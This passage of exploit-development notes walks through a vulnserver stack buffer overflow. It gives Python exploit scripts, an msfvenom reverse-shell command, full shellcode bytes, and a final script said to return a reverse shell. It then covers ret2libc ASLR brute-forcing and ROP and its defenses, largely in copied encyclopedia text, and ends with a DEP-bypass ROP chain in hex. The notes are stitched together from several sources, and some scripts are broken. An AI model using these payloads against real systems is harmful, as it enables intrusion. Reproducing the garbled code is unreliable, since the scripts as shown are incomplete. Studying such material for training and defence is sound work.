Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh
2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8
Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9G"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print s.recv(1024)
s.close()
(FYI, if you want to learn about socket() and connect() function calls, see my SLAE x86 posts
where we create bind and reverse TCP shells in Assembly:)
• Bind TCP
• Reverse TCP
Let’s run vulnserver through Immunity once more and see how our exploit crashes the
application.
Excellent, we now have a location in our string where we know EIP is overwritten. We can feed
this sequence of bytes to Mona and she will do the hard work for us of finding the exact offset
where this sequence occurs in our pattern.txt file we pasted into our exploit.py. We can use
the following command: !mona po 6F43376F
Running this command with Mona yields the following result: - Pattern o7Co (0x6F43376F)
found in cyclic pattern at position 2002
So we now have our offset: 2002 bytes. The offset is essentially how far into our fuzzing string
the EIP overwrite occurs. Our string that we submitted looks like this:
Controlling EIP
What we want to do now is to verify that our offset is correct. This might seem like a painful
process, but approaching buffer overflow exploit development in a methodical way like this,
checking each step, is how we avoid skipping a step and puzzling over our completed exploit
which doesn’t actually exploit anything. We want to chop those 3 sections identified above
into 3 distinct character sets to assess whether or not they actually align as we imagine. We
want the following distinction:
• 2002 bytes: A or 41
• remainder of string: C or 43
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
buffer += "B" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print s.recv(1024)
s.close()
Running this exploit against our Immunity-attached vulnserver should net us an EIP value
of 42424242 since we should be overwriting the value with our B’s.
As you can see, we have successfully controlled EIP and ESP is pointing towards our C’s on the
stack.
At this point in the exploit development process, we want to determine if our application,
vulnserver, will misinterpret any hex characters that may end up in our shellcode. Remember
that we control EIP which tells the program the address of the next instruction to execute.
Since we can place arbitrary values onto the stack (we’ve already done so with our C’s), which
is pointed to by ESP, we can place our malicious payload on the stack and then have EIP point
to ESP which would execute our shellcode.
To search for bad characters, we will replace our C values with every hex character and see
which ones do not show up in the hex dump in Immunity once the application crashes. Mona
to the rescue once again! Feeding Mona the instruction !mona bytearray will produce a string
of every hex character for us to paste into our exploit. Our exploit.py should now look like this:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
badchars =
("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x1
4\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34
\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54
\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74
\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94
\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\
xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\x
d5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf
5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer += "B" * 4
buffer += badchars
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print s.recv(1024)
s.close()
The tell-tale sign of a badcharacter will be that in the hex dump, the perfect sequence of
characters is broken. When we run this exploit against vulnserver and the application crashes
and you right-click ESP and select Follow in Dump, we are presented with the following
pane:
I do not see our sequence of characters anywhere. This could mean that our very first
character, \x00, is in fact a bad character. \x00 is known as a NULL byte and we know from
experience in SLAE that we want to avoid NULL bytes in our shellcode. Let’s remove \x00 from
our payload and see if this fixes anything as we repeat the process.
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
badchars =
("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x1
5\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34
\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54
\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74
\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94
\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\
xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\x
d5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf
5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer += "B" * 4
buffer += badchars
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print s.recv(1024)
s.close()
We are now presented with the following
pane:
As you can see, our entire sequence is presented unbroken. We have determined that \x00 is
our only bad character. This will likely not be the case very often and you must rigorously
check for bad characters by iterating through this process until all bad characters are
eliminated.
Our last use of Mona will be asking her to find a location within the vulnserver application
where there is a memory address which holds the instruction JMP ESP. If we are able to place
this memory location address into EIP, then the process will see that the address of the next
instruction to execute is saying that the instruction is JMP ESP and our process will go
to ESP and execute whatever instructions are located there, in this case our payload!
But not only do we have to find a JMP ESP call, we have to find one that is within a module
that does not have ASLR enabled. ASLR will randomize the instruction location each time the
computer reboots so that these types of exploits are unfeasible. However, programs are not
beholden to strictly use ASLR-enabled, Microsoft-approved modules and often include non-
ASLR modules.
Mona will fetch us what we need with a simple command of: !mona jmp -r
esp
We see that Mona found 9 addresses of JMP ESP calls within vulnserver and all of them
happen to be in the essfunc.dll file with ASLR disabled (set to False). Let’s use the second
instance which is at the memory address:0x625011bb
We can verify this in Immunity by finding this memory location and looking at the opcode for
the address.
• In Immunity, click on the lowercase e at the top of the UI. This will show you the
executable modules for the program.
• We are interested in essfunc.dll since this is where our JMP ESP call lives. Double-click
the essfunc.dll line.
• Right-click in the top left panel, select Search for, select Command, input jmp esp, and
press enter.
So we are sure that Mona wasn’t telling us lies. Since Windows is little-endian, we can place
this address into the EIP overwrite portion of our payload in reverse order so
that 0x625011bb becomes \xbb\x11\x50\x62 in our payload, which now looks like this:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print s.recv(1024)
s.close()
Code Execution!
All that’s left for us to do at this point is to replace the value of the stack, currently a bunch
of C values or bad chars depending on your workflow, with our shellcode. We will also want to
prepend some NOPs to our payload so that we increase the surface area so to speak of our
exploitable code and increase the chance of the program flowing to the location of our
shellcode.
We can do this simply by adding a variable to our script called nop and use the line nop = '\x90'
* 15.
15 is largely an arbitrary number that I often use for this purpose. The amount of NOPs you use
is up to you, but don’t use so many that it affects your buffer space drastically and reduces the
amount of space you can fit your shellcode.
To generate our payload with msfvenom we use the following command: msfvenom -p
windows/shell_reverse_tcp lhost=192.168.1.199 lport=443 EXITFUNC=thread -b "\x00" -f
c which can be broken down as follows:
• EXITFUNC=thread tells msfvenom to create the payload in such a way that it is run in a
sub-thread of the process helping us to avoid crashing the program and achieving a
smooth exit
"\xdb\xcc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x52\xbf\x36\x08\x50"
"\xc1\x31\x7a\x17\x83\xc2\x04\x03\x4c\x1b\xb2\x34\x4c\xf3\xb0"
"\xb7\xac\x04\xd5\x3e\x49\x35\xd5\x25\x1a\x66\xe5\x2e\x4e\x8b"
"\x8e\x63\x7a\x18\xe2\xab\x8d\xa9\x49\x8a\xa0\x2a\xe1\xee\xa3"
"\xa8\xf8\x22\x03\x90\x32\x37\x42\xd5\x2f\xba\x16\x8e\x24\x69"
"\x86\xbb\x71\xb2\x2d\xf7\x94\xb2\xd2\x40\x96\x93\x45\xda\xc1"
"\x33\x64\x0f\x7a\x7a\x7e\x4c\x47\x34\xf5\xa6\x33\xc7\xdf\xf6"
"\xbc\x64\x1e\x37\x4f\x74\x67\xf0\xb0\x03\x91\x02\x4c\x14\x66"
"\x78\x8a\x91\x7c\xda\x59\x01\x58\xda\x8e\xd4\x2b\xd0\x7b\x92"
"\x73\xf5\x7a\x77\x08\x01\xf6\x76\xde\x83\x4c\x5d\xfa\xc8\x17"
"\xfc\x5b\xb5\xf6\x01\xbb\x16\xa6\xa7\xb0\xbb\xb3\xd5\x9b\xd3"
"\x70\xd4\x23\x24\x1f\x6f\x50\x16\x80\xdb\xfe\x1a\x49\xc2\xf9"
"\x5d\x60\xb2\x95\xa3\x8b\xc3\xbc\x67\xdf\x93\xd6\x4e\x60\x78"
"\x26\x6e\xb5\x2f\x76\xc0\x66\x90\x26\xa0\xd6\x78\x2c\x2f\x08"
"\x98\x4f\xe5\x21\x33\xaa\x6e\x8e\x6c\xb5\xa9\x66\x6f\xb5\x34"
"\xcc\xe6\x53\x5c\x22\xaf\xcc\xc9\xdb\xea\x86\x68\x23\x21\xe3"
"\xab\xaf\xc6\x14\x65\x58\xa2\x06\x12\xa8\xf9\x74\xb5\xb7\xd7"
"\x10\x59\x25\xbc\xe0\x14\x56\x6b\xb7\x71\xa8\x62\x5d\x6c\x93"
"\xdc\x43\x6d\x45\x26\xc7\xaa\xb6\xa9\xc6\x3f\x82\x8d\xd8\xf9"
"\x0b\x8a\x8c\x55\x5a\x44\x7a\x10\x34\x26\xd4\xca\xeb\xe0\xb0"
"\x8b\xc7\x32\xc6\x93\x0d\xc5\x26\x25\xf8\x90\x59\x8a\x6c\x15"
"\x22\xf6\x0c\xda\xf9\xb2\x2d\x39\x2b\xcf\xc5\xe4\xbe\x72\x88"
"\x16\x15\xb0\xb5\x94\x9f\x49\x42\x84\xea\x4c\x0e\x02\x07\x3d"
"\x1f\xe7\x27\x92\x20\x22";
We will add our NOPs and shellcode to our exploit at this point so that our final exploit script
will be:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
nop = "\x90" * 15
shellcode = ("\xdb\xcc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x52\xbf\x36\x08\x50"
"\xc1\x31\x7a\x17\x83\xc2\x04\x03\x4c\x1b\xb2\x34\x4c\xf3\xb0"
"\xb7\xac\x04\xd5\x3e\x49\x35\xd5\x25\x1a\x66\xe5\x2e\x4e\x8b"
"\x8e\x63\x7a\x18\xe2\xab\x8d\xa9\x49\x8a\xa0\x2a\xe1\xee\xa3"
"\xa8\xf8\x22\x03\x90\x32\x37\x42\xd5\x2f\xba\x16\x8e\x24\x69"
"\x86\xbb\x71\xb2\x2d\xf7\x94\xb2\xd2\x40\x96\x93\x45\xda\xc1"
"\x33\x64\x0f\x7a\x7a\x7e\x4c\x47\x34\xf5\xa6\x33\xc7\xdf\xf6"
"\xbc\x64\x1e\x37\x4f\x74\x67\xf0\xb0\x03\x91\x02\x4c\x14\x66"
"\x78\x8a\x91\x7c\xda\x59\x01\x58\xda\x8e\xd4\x2b\xd0\x7b\x92"
"\x73\xf5\x7a\x77\x08\x01\xf6\x76\xde\x83\x4c\x5d\xfa\xc8\x17"
"\xfc\x5b\xb5\xf6\x01\xbb\x16\xa6\xa7\xb0\xbb\xb3\xd5\x9b\xd3"
"\x70\xd4\x23\x24\x1f\x6f\x50\x16\x80\xdb\xfe\x1a\x49\xc2\xf9"
"\x5d\x60\xb2\x95\xa3\x8b\xc3\xbc\x67\xdf\x93\xd6\x4e\x60\x78"
"\x26\x6e\xb5\x2f\x76\xc0\x66\x90\x26\xa0\xd6\x78\x2c\x2f\x08"
"\x98\x4f\xe5\x21\x33\xaa\x6e\x8e\x6c\xb5\xa9\x66\x6f\xb5\x34"
"\xcc\xe6\x53\x5c\x22\xaf\xcc\xc9\xdb\xea\x86\x68\x23\x21\xe3"
"\xab\xaf\xc6\x14\x65\x58\xa2\x06\x12\xa8\xf9\x74\xb5\xb7\xd7"
"\x10\x59\x25\xbc\xe0\x14\x56\x6b\xb7\x71\xa8\x62\x5d\x6c\x93"
"\xdc\x43\x6d\x45\x26\xc7\xaa\xb6\xa9\xc6\x3f\x82\x8d\xd8\xf9"
"\x0b\x8a\x8c\x55\x5a\x44\x7a\x10\x34\x26\xd4\xca\xeb\xe0\xb0"
"\x8b\xc7\x32\xc6\x93\x0d\xc5\x26\x25\xf8\x90\x59\x8a\x6c\x15"
"\x22\xf6\x0c\xda\xf9\xb2\x2d\x39\x2b\xcf\xc5\xe4\xbe\x72\x88"
"\x16\x15\xb0\xb5\x94\x9f\x49\x42\x84\xea\x4c\x0e\x02\x07\x3d"
"\x1f\xe7\x27\x92\x20\x22")
buffer = "A" * 2002
buffer += nop
buffer += shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print s.recv(1024)
s.close()
If we run this exploit code against vulnserver at this point we net a reverse shell and our
payload was successfully executed!
C:\Users\IEUser\Desktop>
https://h0mbre.github.io/Boofuzz_to_EIP_Overwrite/#
ASLR Bypass
https://www.ccn-cert.cni.es/pdf/documentos-publicos/xi-jornadas-stic-ccn-cert/2575-m11-06-
rockandropeando/file.html
https://www.exploit-db.com/docs/english/17914-bypassing-aslrdep.pdf
ASLR stands for “Address space layout randomization”. It is a computer security technique
involved in preventing exploitation of memory corruption vulnerabilities, designed to prevent
the buffer overflow attacks. In order to prevent an attacker from reliably jumping to ESP, ASLR
randomly arranges the address space positions of key data areas of a process, including the
base of the executable and the positions of the stack, heap and libraries.
But when ASLR is enabled, it randomizes the address, which means we can’t give the address
of JMP ESP to EIP to execute that command, because ASLR randomizes these addresses, which
means every-time we execute that binary, we will get a new address of JMP ESP, which means
we can’t give that address to execute our payload.
What is libc??
In very simple language, libc is the standard library for the C programming language, which has
predefined classes and methods as a conventional library. C uses this library to import pre-
defined functions, commands.
So, in this return to libc method, instead of giving the address of JMP ESP, we gives the
address of pre-defined functions of the commands which we want to execute.
So, instead of executing JMP ESP on EIP followed by our shell code, what we does here is that
in EIP, we directly executes “system /bin/bash” to escalate our privileges.
As we know about libc, which is a standard library for C language, we uses the
address of the functions such as system, /bin/bash, and exit, and pass them in EIP to execute.
So we executes the command in the order
system → exit → /bin/bash
So to execute them, we are giving the address of these functions from libc to EIP.
To find the addresses of these 3 functions, you can do:
For SYSTEM:
> readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
For EXIT:
> readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
For /bin/sh:
> strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
We gives the addresses of system, exit and /bin/bash by adding their address in base address
of libc.
So to overcome that, there is an option of brute-forcing for the addresses. We had to run this
command multiple times to notice the change, as the change is minor, only of 2–3 bits. To
check the same, use the same command as we used to check the existence of ASLR.
> ldd ./ovrflw | grep libc
Here we observes that only 2 and 3 bits are changing, so we can brute-force it to hit the
correct address.
Suppose we run the command “ldd ./ovrflw | grep libc” and observes that only 2 bits are
changing continuously. So in that case, we can calculate that one bit can change from 0-F,
having 15 places, then 2 bits will give a combination of 15*15=225. So we had to ran our script
225 times to hit the correct one.
We randomly picks an address by running this command “ldd ./ovrflw | grep libc”, and assign
it to the base address of libc in our script. And then we ran our script 225 times. As in 225
times, it will surely gone through that number which we had given to our base address of libc.
We can understand it as, we had 225 options for address field. Now we ran and note a address
before running our script and assign it to base address of libc. And then ran our script 225
times, which means that in 225 different and total combination, it will surely have a
combination which we had given to the base address of libc before. So whenever it touches
that address, the address will match with the address we already using as base address, and it
will execute our command of system /bin/bash and give us a root shell.
https://www.youtube.com/watch?v=cj3CtsxVlL4
A non-executable stack can prevent some buffer overflow exploitation, however it cannot
prevent a return-to-libc attack because in the return-to-libc attack only existing executable
code is used. On the other hand, these attacks can only call preexisting functions. Stack-
smashing protection can prevent or obstruct exploitation as it may detect the corruption of
the stack and possibly flush out the compromised segment.
"ASCII armoring" is a technique that can be used to obstruct this kind of attack. With ASCII
armoring, all the system libraries (e.g., libc) addresses contain a NULL byte (0x00). This is
commonly done by placing them in the first 0x01010101 bytes of memory (a few pages more
than 16 MB, dubbed the "ASCII armor region"), as every address up to (but not including) this
value contains at least one NULL byte. This makes it impossible to emplace code containing
those addresses using string manipulation functions such as strcpy(). However, this technique
does not work if the attacker has a way to overflow NULL bytes into the stack. If the program is
too large to fit in the first 16 MB, protection may be incomplete.[2] This technique is similar to
another attack known as return-to-plt where, instead of returning to libc, the attacker uses the
Procedure Linkage Table (PLT) functions loaded in the position-independent
code (e.g., system@plt, execve@plt, sprintf@plt, strcpy@plt).[3]
Address space layout randomization (ASLR) makes this type of attack extremely unlikely to
succeed on 64-bit machines as the memory locations of functions are random. For 32-bit
systems, however, ASLR provides little benefit since there are only 16 bits available for
randomization, and they can be defeated by brute force in a matter of minutes.[4]
In this technique, an attacker gains control of the call stack to hijack program control flow and
then executes carefully chosen machine instruction sequences that are already present in the
machine's memory, called "gadgets".[4][nb 1] Each gadget typically ends in a return
instruction and is located in a subroutine within the existing program and/or shared library
code.[nb 1] Chained together, these gadgets allow an attacker to perform arbitrary operations
on a machine employing defenses that thwart simpler attacks.
In a standard buffer overrun attack, the attacker would simply write attack code (the
"payload") onto the stack and then overwrite the return address with the location of these
newly written instructions. Until the late 1990s, major operating systems did not offer any
protection against these attacks; Microsoft Windows provided no buffer-overrun protections
until 2004.[5] Eventually, operating systems began to combat the exploitation of buffer
overflow bugs by marking the memory where data is written as non-executable, a technique
known as executable space protection. With this enabled, the machine would refuse to
execute any code located in user-writable areas of memory, preventing the attacker from
placing payload on the stack and jumping to it via a return address overwrite. Hardware
support later became available to strengthen this protection.
With data execution prevention, an adversary cannot execute maliciously injected instructions
because a typical buffer overflow overwrites contents in the data section of memory, which is
marked as non-executable. To defeat this, a return-oriented programming attack does not
inject malicious code, but rather uses unintended instructions that are already present, called
"gadgets", by manipulating return addresses. A typical data execution prevention cannot
defend against this attack because the adversary did not use malicious code but rather
combined "good" instructions by changing return addresses; therefore the code used would
not be marked non-executable.
Return-into-library technique
The rise of 64-bit x86 processors brought with it a change to the subroutine calling convention
that required the first argument to a function to be passed in a register instead of on the stack.
This meant that an attacker could no longer set up a library function call with desired
arguments just by manipulating the call stack via a buffer overrun exploit. Shared library
developers also began to remove or restrict library functions that performed actions
particularly useful to an attacker, such as system call wrappers. As a result, return-into-library
attacks became much more difficult to mount successfully.
The next evolution came in the form of an attack that used chunks of library functions, instead
of entire functions themselves, to exploit buffer overrun vulnerabilities on machines with
defenses against simpler attacks.[8] This technique looks for functions that contain instruction
sequences that pop values from the stack into registers. Careful selection of these code
sequences allows an attacker to put suitable values into the proper registers to perform a
function call under the new calling convention. The rest of the attack proceeds as a return-
into-library attack.
Attacks[edit]
Return-oriented programming builds on the borrowed code chunks approach and extends it to
provide Turing complete functionality to the attacker, including loops and conditional
branches.[9][10] Put another way, return-oriented programming provides a fully functional
"language" that an attacker can use to make a compromised machine perform any operation
desired. Hovav Shacham published the technique in 2007[11] and demonstrated how all the
important programming constructs can be simulated using return-oriented programming
against a target application linked with the C standard library and containing an exploitable
buffer overrun vulnerability.
A return-oriented programming attack is superior to the other attack types discussed both in
expressive power and in resistance to defensive measures. None of the counter-exploitation
techniques mentioned above, including removing potentially dangerous functions from shared
libraries altogether, are effective against a return-oriented programming attack.
On the x86-architecture
It is therefore possible to search for an opcode that alters control flow, most notably the
return instruction (0xC3) and then look backwards in the binary for preceding bytes that form
possibly useful instructions. These sets of instruction "gadgets" can then be chained by
overwriting the return address, via a buffer overrun exploit, with the address of the first
instruction of the first gadget. The first address of subsequent gadgets is then written
successively onto the stack. At the conclusion of the first gadget, a return instruction will be
executed, which will pop the address of the next gadget off the stack and jump to it. At the
conclusion of that gadget, the chain continues with the third, and so on. By chaining the small
instruction sequences, an attacker is able to produce arbitrary program behavior from pre-
existing library code. Shacham asserts that given any sufficiently large quantity of code
(including, but not limited to, the C standard library), sufficient gadgets will exist for Turing-
complete functionality.[11]
An automated tool has been developed to help automate the process of locating gadgets and
constructing an attack against a binary.[12] This tool, known as ROPgadget, searches through a
binary looking for potentially useful gadgets, and attempts to assemble them into an attack
payload that spawns a shell to accept arbitrary commands from the attacker.
The address space layout randomization also has vulnerabilities. According to the paper of
Shacham et al.,[13] the ASLR on 32-bit architectures is limited by the number of bits available
for address randomization. Only 16 of the 32 address bits are available for randomization, and
16 bits of address randomization can be defeated by brute force attack in minutes. For 64-bit
architectures, 40 bits of 64 are available for randomization. In 2016, brute force attack for 40-
bit randomization is possible, but is unlikely to go unnoticed. Also, randomization can be
defeated by de-randomization techniques.
Even with perfect randomization, if there is any information leakage of memory contents it
would help to calculate the base address of for example a shared library at runtime.[14]
Since this new approach does not use a return instruction, it has negative implications for
defense. When a defense program checks not only for several returns but also for several jump
instructions, this attack may be detected.
Defenses
G-Free
The G-Free technique was developed by Kaan Onarlioglu, Leyla Bilge, Andrea Lanzi, Davide
Balzarotti, and Engin Kirda. It is a practical solution against any possible form of return-
oriented programming. The solution eliminates all unaligned free-branch instructions
(instructions like RET or CALL which attackers can use to change control flow) inside a binary
executable, and protects the free-branch instructions from being used by an attacker. The way
G-Free protects the return address is similar to the XOR canary implemented by StackGuard.
Further, it checks the authenticity of function calls by appending a validation block. If the
expected result is not found, G-Free causes the application to crash.[16]
This randomization approach can be taken further by relocating all the instructions and/or
other program state (registers and stack objects) of the program separately, instead of just
library locations.[18][19][20] This requires extensive runtime support, such as a software dynamic
translator, to piece the randomized instructions back together at runtime. This technique is
successful at making gadgets difficult to find and utilize, but comes with significant overhead.
Another approach, taken by kBouncer, modifies the operating system to verify that return
instructions actually divert control flow back to a location immediately following a call
instruction. This prevents gadget chaining, but carries a heavy performance penalty,[clarification
needed]
and is not effective against jump-oriented programming attacks which alter jumps and
other control-flow-modifying instructions instead of returns.[21]
SEHOP
As small embedded systems are proliferating due to the expansion of the Internet Of Things,
the need for protection of such embedded systems is also increasing. Using Instruction Based
Memory Access Control (IB-MAC) implemented in hardware, it is possible to protect low-cost
embedded systems against malicious control flow and stack overflow attacks. The protection
can be provided by separating the data stack and the return stack. However, due to the lack of
a memory management unit in some embedded systems, the hardware solution cannot be
applied to all embedded systems.[23]
In 2010, Jinku Li et al. proposed[24] that a suitably modified compiler could completely
eliminate return-oriented "gadgets" by replacing each call f with the instruction
sequence pushl $index; jmp f and each ret with the instruction
sequence popl %reg; jmp table(%reg), where table represents an immutable tabulation of all
"legitimate" return addresses in the program and index represents a specific index into that
table.[24]: 5–6 This prevents the creation of a return-oriented gadget that returns straight from
the end of a function to an arbitrary address in the middle of another function; instead,
gadgets can return only to "legitimate" return addresses, which drastically increases the
difficulty of creating useful gadgets. Li et al. claimed that "our return indirection technique
essentially de-generalizes return-oriented programming back to the old style of return-into-
libc."[24] Their proof-of-concept compiler included a peephole optimization phase to deal with
"certain machine instructions which happen to contain the return opcode in their opcodes or
immediate operands,"[24] such as movl $0xC3, %eax.
The ARMv8.3-A architecture introduces a new feature at the hardware level that takes
advantage of unused bits in the pointer address space to cryptographically sign pointer
addresses using a specially-designed tweakable block cipher[25][26] which signs the desired value
(typically, a return address) combined with a "local context" value (e.g., the stack pointer).
Before performing a sensitive operation (i.e., returning to the saved pointer) the signature can
be checked to detect tampering or usage in the incorrect context (e.g., leveraging a saved
return address from an exploit trampoline context).
Notably the Apple A12 chips used in iPhones have upgraded to ARMv8.3 and use
PACs. Linux gained support for pointer authentication within the kernel in version 5.7 released
in 2020; support for userspace applications was added in 2018.[27]
In 2022, researchers at MIT published a side-channel attack against PACs dubbed PACMAN.[28]
https://www.offensive-security.com/awe/AWEPAPERS/NtProtectVirtualMemory.pdf
GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM
binaries.
Rop Chain
https://www.ired.team/offensive-security/code-injection-process-injection/binary-
exploitation/rop-chaining-return-oriented-programming
https://github.com/dannyc-dev/Building-the-ROP-Chain
https://www.youtube.com/watch?v=YY-2u7DgNgQ
An attack using the ROP chain is possible if there is a vulnerability in the target application.
Windows has two main ways to safeguard software: Data Execution Prevention or DEP, as well
as Address Space Layout Randomization or ASLR.
These mechanisms also can be bypassed with more advanced technics. DEP can be bypassed
by calling memory allocation/protection functions from the application import address table
(IAT). Some examples of such functions:
• SetProcessDEPPolicy(). With this function, a perpetrator can change the DEP policy for
the process, which ultimately allows for the shellcode to be executed from the stack. It
works only on Windows XP SP3, Vista SP1, and Server 2008 and requires DEP Policy to
be set to OptOut or OptIn.
• VirtualProtect(PAGE_READ_WRITE_EXECUTE). It allows hackers to mark the location
with the shellcode as an executable for the memory page in question. It is made
possible by changing the access protection level.
• NtSetInformationProcess(). DEP policy for the current process can be changed using
this function. It allows perpetrators to execute shellcode from the stack.
Bypass of ASLR is possible by determining the load address of desired modules (for example,
kernel32.dll) and generating proper addresses for the whole ROP chain.
Let’s consider an example of an application with a stack overflow vulnerability. This program
allows an attacker to overwrite the return address in the stack frame and set EIP to the desired
value, thus executing code from the stack. For the sake of simplicity, in this article the
application supports only DEP protection and does not support ASLR protection – we disable
this option via Visual Studio project properties:
The simplest application with stack overflow issue may look like this:
if (fileStream)
{
fileStream.seekg(0, fileStream.end);
fileStream.seekg(0, fileStream.beg);
std::cout << "Reading " << length << " characters... ";
fileStream.read(smallBuffer,length);
if (fileStream)
else
std::cout << "error: only " << fileStream.gcount() << " could be read";
fileStream.close();
As you may see – the stack overflow issue can be easily achieved. However, in order to build
this code in Visual Studio 2015 which is used in this article, we need to add
#pragma check_stack(off)
This app can be built using any other build environment without that option.
File test.txt which is read by the application contains an ROP chain. ROP chain is specifically
designed to bypass DEP protection and call our code.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 31 32 33 34 31 32 33 34
74 74 74 74 31 32 33 34 31 32 33 34 31 32 33 34
31 32 33 34 31 32 33 34 31 32 33 34 31 32 33 34
31 32 33 34 74 74 74 74 31 32 33 34 31 32 33 34
31 32 33 34 31 32 33 34 31 32 33 34 31 32 33 34
31 32 33 34 31 32 33 34 BA E3 83 6A 00 20 88 6A
FF FF FF FF 00 00 00 00 00 00 00 00 88 D5 84 6A
AB CF 82 6A 75 B9 85 6A 8E 4E 83 6A 00 F0 FF FF
A0 10 00 00 40 00 00 00 00 20 88 6A F8 60 83 6A
E5 FF 82 6A 00 20 88 6A F8 FF FF FF 6F 28 83 6A
6F 28 83 6A 78 BE 83 6A BA 25 84 6A BE 3C 85 6A
DE 10 83 6A 31 32 33 34 A3 5E 83 6A A3 5E 83 6A
A3 5E 83 6A 5B 5E 83 6A 56 16 83 6A FB 22 85 6A
D3 F3 85 6A 8B F4 81 C4 1C FF FF FF EB 22 75 73
65 72 33 32 2E 64 6C 6C 00 4D 65 73 73 61 67 65
42 6F 78 41 00 90 90 90 90 90 90 90 90 90 90 90
8D 46 0A 50 3E FF 15 60 50 88 6A 8B C8 8D 5E 15
53 51 3E FF 15 AC 50 88 6A FF D0 CC
In this file ROP chain begins with ba e3 83 6a (0x6a83e3ba). This is a place in a file after a crash
where EIP points to. ROPgadget.py is a utility to gather possible ROP gadgets for a given
